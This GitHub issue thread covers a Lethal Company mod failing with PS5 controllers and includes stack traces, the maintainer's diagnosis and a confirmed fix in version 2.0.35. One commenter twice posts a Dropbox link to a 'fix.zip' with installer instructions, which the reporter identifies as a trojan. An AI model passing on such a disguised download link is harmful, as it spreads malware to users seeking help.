### ISSUE TITLE
[BUG] Mod no longer works with PS5 controllers

### ISSUE THREAD

**Issue by Nexensis** [cmooref17/ReservedItemSlotMods#57]
I believe the mod was working perfectly as of the release of v55 of Lethal Company, and from what I saw mostly working on v60. 

As of the latest release though it's broken with a PS5 controller plugged into my PC. 

I have the following mods installed: ReservedItemSlotCore v2.0.34, ReservedFlashlightSlot v2.0.7, and ReservedWalkieSlot v2.0.6. 

I've noticed the following: 

- Starting the game with a controller active makes the Walkie slot not appear.
- Plugging in a controller after means the slot is there but then the items appear in the normal slots and the reserved slots. 
- Dropping the torch (not tested with the walkie yet) keeps the item in the reserved slot but prevents me from interacting with anything else, including doors and other items. 

Any suggestions on things to change in the config files that may get this working? I'm using default controller settings, I'm not using DS4Windows currently. I'm managing the mods through r2modman 3.1.49.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Nexensis** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

That appears to be a trojan virus. 
![image](https://github.com/user-attachments/assets/28329afd-b162-4122-b1f3-ca0d7611ec77)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by cmooref17** [comment]
Sorry about the comments I deleted, but I don't want any download links that may potentially have viruses. Linking to other sources that talk about this issue would be more preferble.

**Comment by cmooref17** [comment]
As for your issue, I'm not sure why it's not working all of a sudden, but not much has changed about my mod that I can think of that would affect that. I can look into it when I have some free time.

**Comment by Nexensis** [comment]
It certainly is an odd one. It mostly works if I plug the controller in after loading the game and don't drop my torch. 

Sure thing, do you think it'll just be the core mod or the extra ones as well?

**Comment by Nexensis** [comment]
I rolled back to ReservedItemSlotCore v2.0.32 and it seems to be working fine.

**Comment by cmooref17** [comment]
And for sure won't work on 2.0.34?
Is that the only controller you have that you could test with?

I'll double check that my xbox controller works.

**Comment by cmooref17** [comment]
Yeah, the latest version seems to work fine on my xbox controller.
So what part doesn't work? Do you even see the controls that say Hold: [RB] (or whatever control it is) appear when you try to use inputs from you PS5 controller?

**Comment by Nexensis** [comment]
Yeah I see the button prompts but it just kind of locks the buttons from doing anything. It's like the item gets stuck highlighted. Even the default keyboard bindings don't work. Even when I disconnect the controller. 

I can test on a PS4 controller as well. I have the PS5 controller connected by cable but I tried wirelessly too but it didn't seem to work.

**Comment by Nexensis** [comment]
Below is an error message from the BepInEx window.

>[Warning: Unity Log] Parent of RectTransform is being set with parent property. Consider using the SetParent method instead, with the worldPositionStays argument set to false. This will retain local orientation and scale rather than world orientation and scale, which can prevent common UI scaling issues.
[Error  : Unity Log] ArgumentOutOfRangeException: Specified argument was out of the range of valid values.
Parameter name: index
Stack trace:
UnityEngine.InputSystem.Utilities.ReadOnlyArray`1[TValue].get_Item (System.Int32 index) (at <dbb0ce7b96144bd8bcbcb8b0d765f970>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateHotkeyTooltipText () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateUI () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Patches.HUDPatcher.OnUpdateReservedItemSlots () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.SessionManager.UnlockReservedItemSlot (ReservedItemSlotCore.Data.ReservedItemSlotData itemSlotData) (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.SessionManager.UnlockAllPendingItemSlots () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Networking.SyncManager+<OnSyncedWithServerDelayed>d__33.MoveNext () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
UnityEngine.SetupCoroutine.InvokeMoveNext (System.Collections.IEnumerator enumerator, System.IntPtr returnValueAddress) (at <e27997765c1848b09d8073e5d642717a>:0)

>[Error  : Unity Log] ArgumentOutOfRangeException: Specified argument was out of the range of valid values.
Parameter name: index
Stack trace:
UnityEngine.InputSystem.Utilities.ReadOnlyArray`1[TValue].get_Item (System.Int32 index) (at <dbb0ce7b96144bd8bcbcb8b0d765f970>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateHotkeyTooltipText () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateUsingController (StartOfRound __instance) (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
(wrapper dynamic-method) StartOfRound.DMD<StartOfRound::Update>(StartOfRound)

>[Info   :ReservedItemSlotCore-2.0.34] Beginning grab on reserved item: Pro-flashlight Previous item slot: 0
[Warning: Unity Log] Parent of RectTransform is being set with parent property. Consider using the SetParent method instead, with the worldPositionStays argument set to false. This will retain local orientation and scale rather than world orientation and scale, which can prevent common UI scaling issues.
[Error  : Unity Log] ArgumentOutOfRangeException: Specified argument was out of the range of valid values.
Parameter name: index
Stack trace:
UnityEngine.InputSystem.Utilities.ReadOnlyArray`1[TValue].get_Item (System.Int32 index) (at <dbb0ce7b96144bd8bcbcb8b0d765f970>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateHotkeyTooltipText () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Patches.HUDPatcher.UpdateUI () (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
ReservedItemSlotCore.Patches.PlayerPatcher.GrabReservedItemClientRpcPostfix (System.Boolean grabValidated, Unity.Netcode.NetworkObjectReference grabbedObject, GameNetcodeStuff.PlayerControllerB __instance) (at <2d4f15d4ae8049ebba252d7f1057f548>:0)
(wrapper dynamic-method) GameNetcodeStuff.PlayerControllerB.DMD<GameNetcodeStuff.PlayerControllerB::GrabObjectClientRpc>(GameNetcodeStuff.PlayerControllerB,bool,Unity.Netcode.NetworkObjectReference)
GameNetcodeStuff.PlayerControllerB.__rpc_handler_2552479808 (Unity.Netcode.NetworkBehaviour target, Unity.Netcode.FastBufferReader reader, Unity.Netcode.__RpcParams rpcParams) (at <066a7b7eb8c24d4facd1e255e669803f>:0)
Unity.Netcode.RpcMessageHelpers.Handle (Unity.Netcode.NetworkContext& context, Unity.Netcode.RpcMetadata& metadata, Unity.Netcode.FastBufferReader& payload, Unity.Netcode.__RpcParams& rpcParams) (at <895801699cfc4b4ab52267f31e2a4998>:0)
Rethrow as Exception: Unhandled RPC exception!
UnityEngine.Debug:LogException(Exception)
Unity.Netcode.RpcMessageHelpers:Handle(NetworkContext&, RpcMetadata&, FastBufferReader&, __RpcParams&)
Unity.Netcode.ClientRpcMessage:Handle(NetworkContext&)
Unity.Netcode.NetworkBehaviour:__endSendClientRpc(FastBufferWriter&, UInt32, ClientRpcParams, RpcDelivery)
GameNetcodeStuff.PlayerControllerB:DMD<GameNetcodeStuff.PlayerControllerB::GrabObjectClientRpc>(PlayerControllerB, Boolean, NetworkObjectReference)
GameNetcodeStuff.PlayerControllerB:GrabObjectServerRpc(NetworkObjectReference)
GameNetcodeStuff.PlayerControllerB:__rpc_handler_1554282707(NetworkBehaviour, FastBufferReader, __RpcParams)
Unity.Netcode.RpcMessageHelpers:Handle(NetworkContext&, RpcMetadata&, FastBufferReader&, __RpcParams&)
Unity.Netcode.ServerRpcMessage:Handle(NetworkContext&)
Unity.Netcode.NetworkBehaviour:__endSendServerRpc(FastBufferWriter&, UInt32, ServerRpcParams, RpcDelivery)
GameNetcodeStuff.PlayerControllerB:GrabObjectServerRpc(NetworkObjectReference)
GameNetcodeStuff.PlayerControllerB:DMD<GameNetcodeStuff.PlayerControllerB::BeginGrabObject>(PlayerControllerB)
GameNetcodeStuff.PlayerControllerB:DMD<GameNetcodeStuff.PlayerControllerB::Interact_performed>(PlayerControllerB, CallbackContext)
UnityEngine.InputSystem.LowLevel.<>c__DisplayClass7_0:<set_onUpdate>b__0(NativeInputUpdateType, NativeInputEventBuffer*)
UnityEngineInternal.Input.NativeInputSystem:NotifyUpdate(NativeInputUpdateType, IntPtr)

**Comment by cmooref17** [comment]
Thanks for the logs! I think this tells me where this is failing. Let me look into this and I'll post any updates here!

**Comment by cmooref17** [comment]
Just out of curiosity, do you use the InputUtils mod? It might help me narrow down some specific theories.

**Comment by cmooref17** [comment]
Actually, ignore that. I just disabled InputUtils, and now I'm running into the issue.

Okay, so without InputUtils, you can't really rebind my controls, and I just never assigned a keybind to Toggle the Reserved Hotbar, but I did have a keybind that you hold to swap to the Reserved Keybind.

Anyways, long story short, it seems like the game was expecting two keybinds, one for keyboard, and another for controller for the Toggle keybind when that didn't exist for the keyboard.

I will get this fixed soon! Thanks so much for posting this!

By the way, I do recommend getting the InputUtils mod, since most of my mods use this to rebind controls.

**Comment by cmooref17** [comment]
Could you let me know if this issue is resolved on 2.0.35? I just pushed the update.

**Comment by Nexensis** [comment]
Just tested it, had to manually install the mod as the mod manager I'm using didn't pick it up yet but it seems to be working correctly! Thanks a lot :)
